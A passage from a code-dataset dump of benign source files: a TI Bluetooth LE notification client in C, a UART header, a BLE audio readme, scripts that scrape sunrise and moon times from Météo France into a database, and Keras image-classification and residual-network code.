machine.\n Ancs_handleNotifAttrRsp(pNotif->notifData.notificationUID);\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_performNegativeAction\n *\n * @brief Performs a negative action on the notification with the passed UID\n *\n * @param notifUID - A pointer to a four byte array that contains a notification's UID\n *\n * @return status - Returns the status of the GATT write\n */\n\nstatic uint8_t Ancs_performNegativeAction(uint8_t* notifUID)\n{\n // This will store the return value.\n uint8_t status;\n\n // Declare the GATT write request.\n attWriteReq_t req;\n\n // Allocate the memory for the request.\n req.pValue = GATT_bm_alloc(Ancs_connHandle, ATT_WRITE_REQ, PERFORM_NOTIFICATION_ACTION_LENGTH, NULL);\n\n // If the allocation was not successful, set status to FAILURE.\n if (req.pValue == NULL)\n status = FAILURE;\n\n // If not, proceed with the GATT request.\n else\n {\n // Create a pointer to the request's data portion.\n uint8_t *requestPayload = req.pValue;\n\n // Set the handle to the Control Point's start handle stored in the handle cache.\n req.handle = Ancs_handleCache[ANCS_CTRL_POINT_HDL_START];\n\n // Set the write length of the GATT write.\n req.len = PERFORM_NOTIFICATION_ACTION_LENGTH;\n\n // Set the command ID to perform an action on the notification.\n *requestPayload = COMMAND_ID_PERFORM_NOTIFICATION_ACTION;\n requestPayload++;\n\n // Copy the ANCS notification UID to the request.\n VOID memcpy(requestPayload, notifUID, ANCS_NOTIF_UID_LENGTH);\n requestPayload += ANCS_NOTIF_UID_LENGTH;\n\n // Set the action type to negative.\n *requestPayload = ACTION_ID_NEGATIVE;\n\n // Signature and command must be set to zero.\n req.sig = 0;\n req.cmd = 0;\n\n status = GATT_WriteCharValue(Ancs_connHandle, &req, ICall_getEntityId());\n // If the GATT write is unsuccessful, free the allocated memory and set the status to FAILURE.\n if (status != SUCCESS)\n GATT_bm_free((gattMsg_t *) &req, ATT_WRITE_REQ);\n }\n\n return status;\n}\n\n/*********************************************************************\n * @fn Ancs_performPositiveAction\n *\n * @brief Performs a positive action on the notification with the passed UID\n *\n * @param notifUID - A pointer to a four byte array that contains a notification's UID\n *\n * @return status - Returns the status of the GATT write\n */\n\nstatic uint8_t Ancs_performPositiveAction(uint8_t *notifUID)\n{\n // This will store the return value.\n uint8_t status;\n\n // Declare the GATT write request.\n attWriteReq_t req;\n\n // Allocate the memory for the request.\n req.pValue = GATT_bm_alloc(Ancs_connHandle, ATT_WRITE_REQ, PERFORM_NOTIFICATION_ACTION_LENGTH, NULL);\n\n // If the allocation was not successful, set status to FAILURE.\n if (req.pValue == NULL)\n status = FAILURE;\n\n // If not, proceed with the GATT request.\n else\n {\n // Create a pointer to the request's data portion.\n uint8_t *requestPayload = req.pValue;\n\n // Set the handle to the Control Point's start handle stored in the handle cache.\n req.handle = Ancs_handleCache[ANCS_CTRL_POINT_HDL_START];\n\n // Set the write length of the GATT write.\n req.len = PERFORM_NOTIFICATION_ACTION_LENGTH;\n\n // Set the command ID to perform an action on the notification.\n *requestPayload = COMMAND_ID_PERFORM_NOTIFICATION_ACTION;\n requestPayload++;\n\n // Copy the ANCS notification UID to the request.\n VOID memcpy(requestPayload, notifUID, ANCS_NOTIF_UID_LENGTH);\n requestPayload += ANCS_NOTIF_UID_LENGTH;\n\n // Set the action type to positive.\n *requestPayload = ACTION_ID_POSITIVE;\n\n // Signature and command must be set to zero.\n req.sig = 0;\n req.cmd = 0;\n\n status = GATT_WriteCharValue(Ancs_connHandle, &req, ICall_getEntityId());\n // If the GATT write is unsuccessful, free the allocated memory and set the status to FAILURE.\n if (status != SUCCESS)\n GATT_bm_free((gattMsg_t *) &req, ATT_WRITE_REQ);\n }\n\n return status;\n}\n\n/*********************************************************************\n * @fn Ancs_printNotifDate\n *\n * @brief Processes the date data and prints it in a more user friendly format.\n *\n * @param dataBuf - Pointer to the Data buffer the data is stored in.\n *\n * @return none\n */\nstatic void Ancs_printNotifDate(uint8_t *dataBuf)\n{\n if(dataBuf[12] == '\\0')\n return;\n\n char year[5] = {'\\0'};\n char month[3] = {'\\0'};\n char day[3] = {'\\0'};\n char hour[3] = {'\\0'};\n char minute[3] = {'\\0'};\n char second[3] = {'\\0'};\n\n memcpy(year, dataBuf, 4);\n memcpy(month, dataBuf + 4, 2);\n memcpy(day, dataBuf + 6, 2);\n memcpy(hour, dataBuf + 9, 2);\n memcpy(minute, dataBuf + 11, 2);\n memcpy(second, dataBuf + 13, 2);\n\n uint8_t num;\n char time[14] = {'\\0'};\n time[2] = ':';\n memcpy(time + 3, minute, 2);\n time[5] = ':';\n memcpy(time + 6, second, 2);\n num = 10 * (hour[0] - '0') + (hour[1] - '0');\n\n if (num > 12)\n {\n num -= 12;\n memcpy(time + 8, \" PM\", 3);\n }\n else\n memcpy(time + 8, \" AM\", 3);\n\n if (num < 10)\n {\n time[0] = '0';\n time[1] = (char) (num + '0');\n }\n else\n {\n time[0] = '1';\n time[1] = (char) ((num % 10) + '0');\n }\n\n if(memcmp(month,\"01\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tJanuary %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"02\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tFebruary %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"03\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tMarch %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"04\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tApril %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"05\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tMay %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"06\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tJune %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"07\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tJuly %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"08\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tAugust %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"09\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tSeptember %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"10\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tOctober %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"11\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tNovember %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"12\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tDecember %s, %s at %s\", day, year, time);\n\n else\n Display_print4(dispHandle, 11, 0, \"* Date:\\t\\t%s/%s/%s at %s\", month, day, year, time);\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_queueNewNotif\n *\n * @brief Extract data from the GATT notification and push it to the queue.\n *\n * @param pMsg - GATT message.\n *\n * @return none\n */\nvoid Ancs_queueNewNotif(gattMsgEvent_t *pMsg)\n{\n\n uint8_t len = pMsg->msg.handleValueNoti.len;\n if (len != 8)\n {\n Display_print0(dispHandle, 11, 0, \"\");\n Display_print0(dispHandle, 11, 0, \"Error evt len\");\n return;\n }\n\n // Create pointer to GATT notification data.\n uint8_t *packetData = pMsg->msg.handleValueNoti.pValue;\n\n // Store the ANCS notification's eventID\n uint8_t eventID = packetData[0];\n\n // Store the ANCS notification's eventFlag\n#ifdef IGNORE_PREEXISTING_NOTIFICATIONS\n uint8_t eventFlag = packetData[1];\n#endif\n\n // Store the ANCS notification's categoryID\n uint8_t categoryID = packetData[2];\n\n // Notification UID from packetData[4] to packetData[7]\n uint8_t* pNotificationUID = packetData + ANCS_NOTIF_UID_LENGTH;\n\n\n#ifdef IGNORE_PREEXISTING_NOTIFICATIONS\n if (eventFlag & EVENT_FLAG_PREEXISTING)\n return;\n#endif\n\n if (eventID == EVENT_ID_NOTIFICATION_ADDED)\n {\n // If it is not in the search list, add it.\n Ancs_pushNotifToQueue(categoryID, pNotificationUID);\n }\n else if (eventID == EVENT_ID_NOTIFICATION_REMOVED)\n {\n if(memcmp(pNotificationUID, currentNotifUID, 4))\n Ancs_findAndRemoveFromQueue(pNotificationUID);\n }\n\n // Move to the attribute retrieval process.\n Ancs_processNotifications();\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_subsDataSrc\n *\n * @brief Subscribe Data Source\n *\n * @param none\n *\n * @return uint8_t SUCCESS/FAILURE\n */\nuint8_t Ancs_subsDataSrc(void)\n{\n // Empty notification list first\n Ancs_popAllNotifsFromQueue();\n\n // Call the function to write \"01\" to the Data Source CCCD.\n return Ancs_CCCDConfig(Ancs_handleCache[ANCS_DATA_SRC_HDL_CCCD], TRUE);\n}\n\n/*********************************************************************\n * @fn Ancs_subsNotifSrc\n *\n * @brief Subscribe Notification Source\n *\n * @param none\n *\n * @return uint8_t SUCCESS/FAILURE\n */\nuint8_t Ancs_subsNotifSrc(void)\n{\n // Empty notification list first\n Ancs_popAllNotifsFromQueue();\n\n // Call the function to write \"01\" to the Notification Source CCCD.\n return Ancs_CCCDConfig(Ancs_handleCache[ANCS_NOTIF_SCR_HDL_CCCD], TRUE);\n}\n\n/*********************************************************************\n *********************************************************************/\n"
},
{
"alpha_fraction": 0.45726922154426575,
"alphanum_fraction": 0.46811243891716003,
"avg_line_length": 39.51445007324219,
"blob_id": "c0ed5ecba628f21f28f3d1190908dd8363b1e6a2",
"content_id": "cb33ae1f174dd835873cf1e103372bc47a520e6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 7009,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 173,
"path": "/source/ti/blestack/sdi/src/inc/sdi_tl_uart.h",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file sdi_tl_uart.h\n\n SDI Transport Layer Module for UART\n\n Group: CMCU, LPC, SCS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2015-2017, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n ******************************************************************************\n Release Name: simplelink_cc2640r2_sdk_1_30_00_25\n Release Date: 2017-03-02 20:08:35\n *****************************************************************************/\n#ifndef SDI_TL_UART_H\n#define SDI_TL_UART_H\n\n#ifdef __cplusplus\nextern \"C\"\n{\n#endif\n\n// ****************************************************************************\n// includes\n// ****************************************************************************\n#include <ti/drivers/UART.h>\n// ****************************************************************************\n// defines\n// ****************************************************************************\n\n#define SDI_UART_FC_THRESHOLD 48\n#define SDI_UART_IDLE_TIMEOUT 6\n#define SDI_UART_INT_ENABLE TRUE\n\n#if !defined(SDI_UART_BR)\n#define SDI_UART_BR 115200 //921600\n#endif // !SDI_UART_BR\n\n// UART ISR Buffer define\n#define UART_ISR_BUF_SIZE 128\n#define UART_ISR_BUF_CNT 2\n\n// ****************************************************************************\n// typedefs\n// ****************************************************************************\n // -----------------------------------------------------------------------------\n//! \\brief Typedef for call back function mechanism to notify SDI TL that\n//! an SDI transaction has occured\n//! \\param[in] uint16 number of bytes received\n//! \\param[in] uint16 number of bytes transmitted\n//!\n//! \\return void\n// -----------------------------------------------------------------------------\ntypedef void (*sdiCB_t)(uint16 Rxlen, uint16 Txlen);\n\n// -----------------------------------------------------------------------------\n//! \\brief Typedef for call back function mechanism to reroute incoming SDI\n//! messages.\n//! NOTE: Definer MUST copy contents to local buffer. SDI task will\n//! free this memory.\n//! NOTE: The contained message buffer does NOT include any \"framing\"\n//! bytes, ie. SOF, FCS etc.\n//! \\param[in] pMsg Pointer to \"unframed\" message buffer.\n//!\n//! \\return void\n// -----------------------------------------------------------------------------\ntypedef void (*sdiTLIncomingEventCBack_t)(uint8_t event, uint8_t *pMsg, uint8_t len);\n\n//*****************************************************************************\n// globals\n//*****************************************************************************\nextern UART_Params paramsUART;\n//*****************************************************************************\n// function prototypes\n//*****************************************************************************\n\nuint8 SDITLUART_configureUARTParams(UART_Params *initParams);\n\n// -----------------------------------------------------------------------------\n//! \\brief This routine initializes the transport layer and opens the port\n//! of the device.\n//!\n//! \\param[in] tRxBuf - pointer to SDI TL Tx Buffer\n//! \\param[in] tTxBuf - pointer to SDI TL Rx Buffer\n//! \\param[in] sdiCBack - SDI TL call back function to be invoked at the end of\n//! a UART transaction\n//!\n//! \\return void\n// -----------------------------------------------------------------------------\nvoid SDITLUART_initializeTransport(char *tRxBuf, char *tTxBuf, sdiCB_t sdiCBack);\n\nvoid SDITLUART_closeUART(void);\n\n// -----------------------------------------------------------------------------\n//! \\brief Register callback function to reroute incoming (from UART)\n//! SDI messages.\n//!\n//! \\param[in] appRxCB Callback fucntion.\n//!\n//! \\return void\n// -----------------------------------------------------------------------------\nextern void SDITLUART_registerIncomingRXErrorStatusAppCB(sdiTLIncomingEventCBack_t appRxErrStatusCB);\n\n\n// -----------------------------------------------------------------------------\n//! \\brief This routine reads data from the UART\n//!\n//! \\return void\n// -----------------------------------------------------------------------------\nvoid SDITLUART_readTransport(void);\n\n// -----------------------------------------------------------------------------\n//! \\brief This routine writes copies buffer addr to the transport layer.\n//!\n//! \\param[in] len - Number of bytes to write.\n//!\n//! \\return uint16 - number of bytes written to transport\n// -----------------------------------------------------------------------------\nuint16 SDITLUART_writeTransport(uint16);\n\n// -----------------------------------------------------------------------------\n//! \\brief This routine stops any pending reads\n//!\n//! \\return void\n// -----------------------------------------------------------------------------\nvoid SDITLUART_stopTransfer(void);\n\n// -----------------------------------------------------------------------------\n//! \\brief This routine is called from the application context when MRDY is\n//! de-asserted\n//!\n//! \\return void\n// -----------------------------------------------------------------------------\nvoid SDITLUART_handleMrdyEvent(void);\n\n\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* SDI_TL_UART_H */\n"
},
{
"alpha_fraction": 0.4482758641242981,
"alphanum_fraction": 0.4482758641242981,
"avg_line_length": 28,
"blob_id": "b160ce792fe9ad8f3b456a05ca3040afc47462c1",
"content_id": "68941a199ea84dee8bee4e55d8d6629128d0e920",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 1,
"path": "/tools/scripts/voice/codec/__init__.py",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "__all__ = [\"codec\", \"adpcm\"]\n"
},
{
"alpha_fraction": 0.7754911184310913,
"alphanum_fraction": 0.777362048625946,
"avg_line_length": 38.592594146728516,
"blob_id": "be78f5c512f6a9e26aca8df495d5f33793754349",
"content_id": "3091ccefbb13feee35b8e27a5d870c4b356bea50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1069,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 27,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_peripheral_bidirectional_audio/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "Purpose / Scope\n===============\n\nThis page will document how to demonstrate an end to end full duplex BLE\nvoice/audio solution using two CC26xx devices.\nEmphasis will be placed on the central device which is responsible for\nestablishing the connection.\n\nVoice data is transferred over BLE using the TI audio\\_profile\\_dle which is a\nVoice Over GATT Profile (VoGP) design. This profile has been augmented to use\ndata length extension and large MTU.\n\nThis profile has been update to add an additional start byte. This new start\nbyte indicates that the following stream uses mSBC compression.\n\nIn this demo, data flows bidirectionally between a streamer (GATT server) and a\nreceiver (GATT client) device. This means both devices must act as both a GATT\nclient and a GATT server.\n\nThe `simple_peripheral_bidirectional_audio` project is a modified version of\n`simple_peripheral` from the BLE-SDK.\n\nPurpose / Scope\n===============\n\nThe theory and steps required to run the demo are described in the readme\ninside the `simple_central_bidirectional_audio` folder of this repo.\n"
}
] | 34 |
deneth/Ephemeris | https://github.com/deneth/Ephemeris | 73f0d022233a2c86f9a61b0ae22f6aee3497319c | f29f2e5b4407da94aa6320cef0f06e4741748eea | fcc5985dffe8e008ededfb44cd53330afa2d2afe | refs/heads/master | 2020-03-29T20:35:44.665481 | 2015-01-10T13:07:22 | 2015-01-10T13:07:22 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6361209750175476,
"alphanum_fraction": 0.642793595790863,
"avg_line_length": 33.06060791015625,
"blob_id": "c95453e83390be0bd5f047a7528b673fc6f2c487",
"content_id": "60c126a241fd55d7460a4d08eafb1b2644ea40b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2248,
"license_type": "no_license",
"max_line_length": 328,
"num_lines": 66,
"path": "/ephemeride-sqlite.py",
"repo_name": "deneth/Ephemeris",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: latin-1 -*-\n\nimport sqlite3\nimport re\nfrom time import sleep, localtime, strftime\nimport commands\nimport sys\n\npath = \"./\"\n\n# Download meteofrance index.html and save it in path+tmp\n# Delete previous file\ncommands.getstatusoutput('/bin/rm '+path+'tmp/index.html')\n# wget http://france.meteofrance.com/\ncommands.getstatusoutput('cd '+path+'tmp/ && curl http://www.meteofrance.com/accueil > index.html')\n\nFete = \"x\"\nSolLever = \"x\"\nSolCoucher = \"x\"\nLuneLever = \"x\"\nLuneCoucher = \"x\"\n\ntoday = strftime(\"%Y-%m-%d\", localtime())\n# Open file to read data\nwith open(path+'tmp/index.html', 'r') as f:\n page_source = f.read()\n\n m = re.search('<div class=\"mod-ephemeride-line mod-ephemeride-line-first\">.+<img src=\"/mf3-base-theme/images/contents/ephemeride-jour.png\" alt=\"Soleil\" />.+<span>Lever : <strong>(.+?)</strong></span>.+<span>Coucher : <strong>(.+?)</strong></span>.+</div>.+<div class=\"mod-ephemeride-line\">',page_source,re.DOTALL) \n if m:\n SolLever = m.group(1)\n SolCoucher = m.group(2)\n m = re.search('<div class=\"mod-ephemeride-line\">.+<img src=\"/mf3-base-theme/images/contents/ephemeride-nuit.png\" alt=\"Lune\" />.+<span>Lever : <strong>(.+?)</strong></span>.+<span>Coucher : <strong>(.+?)</strong></span>',page_source,re.MULTILINE|re.DOTALL) \n if m:\n LuneLever = m.group(1)\n LuneCoucher = m.group(2)\n m = re.search('<div class=\"mod-ephemeride\">.*<h2 class=\"capitalize\">.*</h2>.*<span class=\"mod-ephemeride-saint\">(.+?)</span><br>', page_source,re.MULTILINE|re.DOTALL)\n if m:\n Fete = m.group(1)\n\nf.close()\n\nprint(\"SolLever: %s\" % SolLever)\nprint(\"SolCoucher: %s\" % SolCoucher)\nprint(\"LuneLever: %s\" % LuneLever)\nprint(\"LuneCoucher: %s\" % LuneCoucher)\nprint(\"Fete: %s\" % Fete)\n\n# Save data in the DB\ncon = None\ntry:\n conn = sqlite3.connect(path+'public/database/PiHomeConnect.sqlite')\n sql_command = \"INSERT INTO Ephemeride VALUES('\"+today+\"', '\"+Fete+\"', '\"+SolLever+\"', '\"+SolCoucher+\"', '\"+LuneLever+\"', '\"+LuneCoucher+\"');\"\n print(\"%s\" % (sql_command))\n conn.execute(sql_command)\n conn.commit()\n\nexcept sqlite3.Error, e:\n\n print \"Error %s:\" % e.args[0]\n sys.exit(1)\n\nfinally:\n\n if conn:\n conn.close()\n"
},
{
"alpha_fraction": 0.6508849263191223,
"alphanum_fraction": 0.6557522416114807,
"avg_line_length": 32.79999923706055,
"blob_id": "32413f24e194d65090e47405fb76b7c157075906",
"content_id": "df3ec886b1fdcd002b827004a916bf83ba90309e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2260,
"license_type": "no_license",
"max_line_length": 325,
"num_lines": 65,
"path": "/ephemeride-mysql.py",
"repo_name": "deneth/Ephemeris",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\r\n# -*- coding: latin-1 -*-\r\n\r\nimport sqlite3\r\nimport re\r\nfrom time import sleep, localtime, strftime\r\nimport commands\r\nimport MySQLdb as mdb\r\n\r\npath = \"/home/pi/www/tmp/\"\r\n\r\n# Download meteofrance index.html and save it in /var/www/tmp\r\n# Delete previous file\r\ncommands.getstatusoutput('/bin/rm '+path+'index.html')\r\n# wget http://france.meteofrance.com/\r\ncommands.getstatusoutput('cd '+path+' && wget http://www.meteofrance.com/accueil')\r\n\r\nFete = \"x\"\r\nSolLever = \"x\"\r\nSolCoucher = \"x\"\r\nLuneLever = \"x\"\r\nLuneCoucher = \"x\"\r\n\r\ntoday = strftime(\"%Y-%m-%d\", localtime())\r\n# Open file to read data\r\nwith open(path+'index.html', 'r') as f:\r\n\tpage_source = f.read()\r\n\r\n\tm = re.search('<div class=\"mod-ephemeride-line mod-ephemeride-line-first\">.+<img src=\"/mf3-base-theme/images/contents/ephemeride-jour.png\" alt=\"Soleil\" />.+<span>Lever : <strong>(.+?)</strong></span>.+<span>Coucher : <strong>(.+?)</strong></span>.+</div>.+<div class=\"mod-ephemeride-line\">',page_source,re.DOTALL) \r\n\tif m:\r\n\t\tSolLever = m.group(1)\r\n\t\tSolCoucher = m.group(2)\r\n\tm = re.search('<div class=\"mod-ephemeride-line\">.+<img src=\"/mf3-base-theme/images/contents/ephemeride-nuit.png\" alt=\"Lune\" />.+<span>Lever : <strong>(.+?)</strong></span>.+<span>Coucher : <strong>(.+?)</strong></span>',page_source,re.MULTILINE|re.DOTALL) \r\n\tif m:\r\n\t\tLuneLever = m.group(1)\r\n\t\tLuneCoucher = m.group(2)\r\n\tm = re.search('<div class=\"mod-ephemeride\">.*<h2 class=\"capitalize\">.*</h2>.*<span class=\"mod-ephemeride-saint\">(.+?)</span><br>', page_source,re.MULTILINE|re.DOTALL)\r\n\tif m:\r\n\t\tFete = m.group(1)\r\n\r\nf.close()\r\n\r\nprint Fete\r\nprint SolLever\r\nprint SolCoucher\r\nprint LuneLever\r\nprint LuneCoucher\r\n\r\ncon = mdb.connect('localhost', 'root', 'raspberry', 'MonitoringPi');\r\ncur = con.cursor()\r\nwith con:\r\n\t\tquery = \"DELETE FROM Ephemerides WHERE date(date)=date(now())\";\r\n\t\tcur.execute(query);\r\n\t\t\r\n\t\tquery = ( \"INSERT INTO Ephemerides ( fete, sollever, solcoucher, lunelever, lunecoucher) \"\r\n\t\t\t\t\t\t\"VALUES (%(fete)s, %(sollever)s, %(solcoucher)s, %(lunelever)s, %(lunecoucher)s)\")\r\n\t\tdata = {\r\n\t\t\t'fete': Fete,\r\n\t\t\t'sollever': SolLever,\r\n\t\t\t'solcoucher': SolCoucher,\r\n\t\t\t'lunelever': LuneLever,\r\n\t\t\t'lunecoucher': LuneCoucher,\r\n\t\t}\r\n\t\t\r\n\t\tcur.execute(query, data)"
}
] | 2 |
zazgf/littlelearn | https://github.com/zazgf/littlelearn | 4c43a63432ca02738f1ebfbd8742881c499ee7b1 | bcfcb46b01d2f0065de0b43be46fbe7d444bb441 | 4260ff2f675ec0f6ab941f2e94c3734f698f0077 | refs/heads/main | 2023-01-30T22:40:59.410040 | 2020-12-14T02:36:09 | 2020-12-14T02:36:09 | 320,527,544 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6757557988166809,
"alphanum_fraction": 0.696502685546875,
"avg_line_length": 23.823530197143555,
"blob_id": "e4059228a1bbb2dfec55d4aa16540bfcab5ba1a7",
"content_id": "8711d9f3de9cd55da5504b933a6cd56bb4825ebf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1715,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 68,
"path": "/residual/mt_p.py",
"repo_name": "zazgf/littlelearn",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\nimport os\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator, load_img, img_to_array\nfrom keras.models import Sequential, load_model\nimport time\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nimport imageio\nimport tensorflow as tf\nimport keras.backend as K\nK.set_image_data_format('channels_last')\nK.set_learning_phase(1)\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\nK.set_session(session)\n\n\n\nmodel_path = './models/model.h5'\nmodel_weights_path = './models/weights.h5'\ntest_path = 'datasets/test'\n\nmodel = load_model(model_path)\nmodel.load_weights(model_weights_path)\n\nimg_width, img_height = 150, 150\n\ndef predict(file):\n x = load_img(file, target_size=(img_width,img_height))\n x = img_to_array(x)\n x = np.expand_dims(x, axis=0)\n with tf.device('/GPU:0'):\n array = model.predict(x)\n result = array[0]\n answer = np.argmax(result)\n if answer == 1:\n print(\"判断:石块较少\")\n elif answer == 0:\n print(\"判断:石块较多\")\n elif answer == 2:\n print(\"Predicted: ok\")\n\n return answer\n\nstart = time.time()\nfor i, ret in enumerate(os.walk(test_path)):\n for i, filename in enumerate(ret[2]):\n if filename.startswith(\".\"):\n continue\n \n print(ret[0] + '/' + filename)\n result = predict(ret[0] + '/' + filename)\n print(\" \")\n\nend = time.time()\ndur = end-start\n\nif dur<60:\n print(\"Execution Time:\",dur,\"seconds\")\nelif dur>60 and dur<3600:\n dur=dur/60\n print(\"Execution Time:\",dur,\"minutes\")\nelse:\n dur=dur/(60*60)\n print(\"Execution Time:\",dur,\"hours\")"
},
{
"alpha_fraction": 0.6096458435058594,
"alphanum_fraction": 0.6623963713645935,
"avg_line_length": 52.61616134643555,
"blob_id": "cb4233df47857b7db3f3a6b28d71d98929d9f9ff",
"content_id": "5322432e8b0da2a7610b7fe47a76918aadc97fc7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5308,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 99,
"path": "/residual/lidar_net.py",
"repo_name": "zazgf/littlelearn",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom keras import layers\nfrom keras.layers import Input, Add,Dense,Activation,ZeroPadding1D,BatchNormalization,Flatten,Conv2D,AveragePooling1D,MaxPooling1D,GlobalMaxPooling1D,Conv1D\nfrom keras.models import Model,load_model\nfrom keras.preprocessing import image\nfrom keras.utils import layer_utils\nfrom keras.utils.data_utils import get_file\nfrom keras.applications.imagenet_utils import preprocess_input\nimport pydot\nfrom IPython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\nfrom keras.utils import plot_model\nfrom keras.initializers import glorot_uniform\nimport scipy.misc\nfrom matplotlib.pyplot import imshow\nfrom matplotlib import pyplot as plt\nfrom keras.preprocessing.image import ImageDataGenerator\nimport os\nfrom keras import callbacks\nimport time\nimport tensorflow as tf\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nimport imageio\nimport keras.backend as K\nimport math\nK.set_image_data_format('channels_last')\nK.set_learning_phase(1)\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\nK.set_session(session)\n\ndef identity_block(X, f, filters, stage, block):\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n F1, F2, F3 = filters\n X_shortcut = X\n X = Conv1D(filters = F1, kernel_size = 1, strides = 1, padding = 'valid', name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=2, name = bn_name_base + '2a')(X)\n X = Activation('relu')(X)\n X = Conv1D(filters = F2, kernel_size=(f), strides = (1), padding='same', name = conv_name_base + '2b', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=2, name = bn_name_base + '2b')(X)\n X = Activation('relu')(X)\n X = Conv1D(filters = F3, kernel_size=(1), strides = 1, padding=\"valid\", name = conv_name_base + '2c', kernel_initializer = glorot_uniform(seed=0))(X)\n X = BatchNormalization(axis=2, name=bn_name_base + '2c')(X)\n X = Add()([X,X_shortcut])\n X = Activation('relu')(X)\n return X\n\ndef convolutional_block(X, f, filters, stage, block, s = 2):\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n F1, F2, F3 = filters\n X_shortcut = X\n X = Conv1D(filters = F1, kernel_size= (1), strides = 